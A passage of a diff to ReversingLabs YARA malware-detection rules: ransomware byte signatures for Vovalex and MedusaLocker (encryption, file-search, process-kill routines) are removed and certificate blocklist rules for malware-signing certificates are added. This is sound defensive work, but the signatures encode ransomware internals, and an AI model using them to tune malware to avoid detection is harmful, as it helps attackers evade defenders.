45 ?? ?? 8D 4D ?? 8B - 9D ?? ?? ?? ?? 51 83 CB ?? 8B C8 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 CB ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 83 CB ?? 83 7D ?? ?? 89 9D ?? ?? ?? ?? 0F 43 4D ?? 83 - 7D ?? ?? 89 9D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 01 3B - 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 73 ?? 8A 01 3A 02 75 ?? 83 FE ?? 74 ?? 8A 41 ?? - 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 33 C0 EB ?? 1B C0 83 - C8 ?? 85 C0 75 ?? 8B 5D ?? 8B 7D ?? C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 8B - CF 50 E8 ?? ?? ?? ?? 51 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 51 83 CB ?? 8B C8 89 9D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 8D 4D ?? 81 CB ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B 5D ?? - 83 FB ?? 0F 43 CF 83 7D ?? ?? 0F 85 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Lerges" and pe.signatures[i].serial=="61:6a:52:05:23:85:90:b0:1d:7b:76:1e:44:4e:4a:d9" and 1421452800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_29Be2278113Dd062Eadca32De6B242D0 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "a2dfd6e0-4475-537a-859e-126dd4a02af7" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15900-L15916" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3df7afba9eda9022a64647ce2a91119d0bdf6fe5b164a1e82b1819409024fbee" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ($import_key) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BLADES" and pe.signatures[i].serial=="29:be:22:78:11:3d:d0:62:ea:dc:a3:2d:e6:b2:42:d0" and 1536883200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Vovalex : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_05F70A557Afd4A443F44D0Baf0Bc8C60 : INFO FILE { meta: - description = "Yara rule that detects Vovalex ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "dd4d7969-1afc-5e5d-9324-89f432523173" - date = "2021-03-12" - modified = "2021-03-12" + id = "9ce5b6c7-fede-508f-a7d0-f9d0b8838645" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.Vovalex.yara#L1-L81" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0c0f065224988bcba45b5aba2dceb080479b0bab235d544daabc3cae72e48318" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15918-L15934" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3945f515b65ca3ffb6c2b64c884bb2790d703a277e1a5ba128c81bc63ed20a25" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Vovalex" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ?? - 48 89 BD ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 - 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 - 8B 9D ?? ?? ?? ?? 48 8B 53 ?? 48 8B 03 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 - 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 83 F8 ?? 75 ?? 48 8B B5 ?? - ?? ?? ?? 48 8B 56 ?? 48 8B 06 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 95 ?? - ?? ?? ?? 8B 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 9D ?? ?? ?? - ?? 48 8B 53 ?? 48 8B 03 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? - ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 48 83 - EC ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 89 9D ?? ?? - ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 89 85 ?? ?? ?? ?? 48 89 9D ?? ?? ?? ?? 48 8D 15 ?? - ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? - 48 89 8D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 9D ?? ?? ?? ?? - 48 89 9D ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 0D - ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 85 ?? ?? ?? ?? 48 89 95 ?? - ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 1D ?? - ?? ?? ?? 48 89 9D ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 89 8D ?? - ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? - ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 - } - $find_files_p1 = { - 48 89 C6 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 - EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 06 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC - ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 - 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 - C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? - ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 - C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 - C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D - 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? - ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? - ?? ?? BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 - } - $find_files_p2 = { - 89 C3 48 8B 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 03 48 89 53 ?? 48 8D 15 ?? ?? - ?? ?? BF ?? ?? ?? ?? 48 89 7B ?? 48 89 53 ?? 48 8D 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 - 89 43 ?? 48 89 4B ?? 48 89 9D ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 45 31 C0 - 4C 89 85 ?? ?? ?? ?? 4C 8D A5 ?? ?? ?? ?? 49 C7 04 24 ?? ?? ?? ?? 49 8B 14 24 48 89 - 95 ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D AD ?? ?? ?? ?? 49 B9 ?? ?? ?? ?? ?? ?? ?? - ?? 4D 89 4D ?? 49 8B 4D ?? 48 89 8D ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D B5 ?? ?? - ?? ?? 4D 89 06 49 8B 16 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? - 45 31 C0 41 3B C0 7E ?? 41 BF ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? - 4D 69 D7 ?? ?? ?? ?? 4D 89 11 4C 89 D2 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? - ?? 48 83 C4 ?? 45 31 C0 41 3B C0 79 ?? 4C 89 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 - C7 01 ?? ?? ?? ?? 48 8B 01 48 89 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 8D ?? ?? - ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 85 C0 7E ?? 48 8B 9D ?? ?? ?? ?? 48 B8 - ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 EB - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="05:f7:0a:55:7a:fd:4a:44:3f:44:d0:ba:f0:bc:8c:60" and 1477440000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4E0665D61997072294A70C662F72Eae3 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "1370a3b5-a254-5197-ac85-5b33e8d9fa38" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15936-L15952" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f07cdfd522db0a92fe1dba30f158b2c89bb5424bdcdfda50ae42fcfddeac19ba" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="4e:06:65:d6:19:97:07:22:94:a7:0c:66:2f:72:ea:e3" and 1474502400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Medusalocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_74702Dff5D4056B847D009A2265Fb1B3 : INFO FILE { meta: - description = "Yara rule that detects MedusaLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8bfcfe13-b519-5c03-9770-cf245b01c395" - date = "2020-07-15" - modified = "2020-07-15" + id = "55f1e321-ce70-519a-9a39-4278162edbef" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.MedusaLocker.yara#L1-L174" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "73f915d476d1411d2e008d00c5ffa03596e3b62bcdbc4d91dc7226599a066c08" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15954-L15970" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8acc57bbf334a48043dbee6fab7b7a54a44801b2ccd0ccd9d14194689c75c021" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "MedusaLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 83 - 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C9 89 4D ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? - ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? - 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? C7 45 ?? ?? ?? ?? ?? 33 C0 89 45 ?? 0F 57 - C0 66 0F 13 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 8B 95 ?? ?? ?? - ?? 83 D2 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 0F 8F ?? - ?? ?? ?? 7C ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? - 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? - C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? - 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 - ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 - } - $encrypt_files_p2 = { - 8A 45 ?? E9 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 - ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? - 8A 45 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 05 ?? - ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 4D ?? E8 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? - 83 C4 ?? 50 6A ?? 8B 4D ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 75 ?? - C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? - 6A ?? 8D 45 ?? 50 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 55 ?? 52 FF 15 - ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? - 8A 45 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? EB ?? E9 ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4D ?? 8B 95 ?? - ?? ?? ?? 89 55 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? - ?? ?? 89 4D ?? 8B 95 ?? ?? ?? ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 - } - $encrypt_files_p3 = { - 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 8D ?? ?? - ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 55 - ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? - ?? ?? 39 45 ?? 0F 85 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 4D ?? - 89 4D ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 52 8B - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 89 - 45 ?? 8B 45 ?? 89 45 ?? 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? - ?? ?? 85 C0 74 ?? 83 7D ?? ?? 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? 8A 45 ?? EB ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? 8A 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D - C2 - } - $search_files_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 45 ?? 53 8B 5D - ?? 56 89 8D ?? ?? ?? ?? 8B 4D ?? 57 89 8D ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 83 - 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 72 ?? 8B - 45 ?? 33 F6 8D 8D ?? ?? ?? ?? 56 56 56 51 56 50 FF 15 ?? ?? ?? ?? 8B F8 8B 85 ?? ?? - ?? ?? 83 FF ?? 75 ?? C7 00 ?? ?? ?? ?? 33 C0 66 89 03 EB ?? 6A ?? 89 30 58 66 39 85 - ?? ?? ?? ?? 75 ?? 66 39 B5 ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 B5 ?? - ?? ?? ?? 75 ?? 8B 8D ?? ?? ?? ?? 51 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 66 39 33 75 ?? 57 - FF 15 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 89 01 8B F7 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? - 8B C6 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 - } - $search_files_2 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 8D 85 ?? ?? ?? - ?? 56 8B 75 ?? 57 8B 7D ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 58 66 39 85 ?? - ?? ?? ?? 75 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 66 83 BD ?? - ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 58 75 ?? 68 - ?? ?? ?? ?? 56 C7 03 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B 4D ?? 5F 5E 33 CD 5B E8 ?? - ?? ?? ?? C9 C3 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 03 8D 85 ?? ?? ?? ?? 50 56 E8 ?? - ?? ?? ?? 83 C4 ?? EB - } - $enum_resources = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 - 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 33 C0 89 45 ?? 66 89 45 ?? B9 ?? ?? ?? - ?? 6B D1 ?? 66 8B 45 ?? 66 89 44 15 ?? B9 ?? ?? ?? ?? C1 E1 ?? BA ?? ?? ?? ?? 66 89 - 54 0D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 - 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 33 C0 66 89 45 ?? 8D - 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 00 89 45 ?? 8D 4D ?? 51 8D 55 ?? 52 - 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 08 51 8D 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? - 83 C4 ?? 8B 08 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 00 89 45 ?? 8B 4D ?? 51 8B - 55 ?? 52 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 - 8B 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? - ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 - } - $kill_processes = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 C0 88 85 ?? ?? ?? - ?? 8B 4D ?? E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? - 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 95 ?? - ?? ?? ?? 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 8D 4D - ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 95 ?? ?? - ?? ?? 85 D2 74 ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? - ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B0 ?? EB ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 - FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 32 - C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 - } - $kill_processes_call = { - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? - 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? - 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 3B 95 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D - ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB - } - $enum_resources_call = { - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D - ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 4D - ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 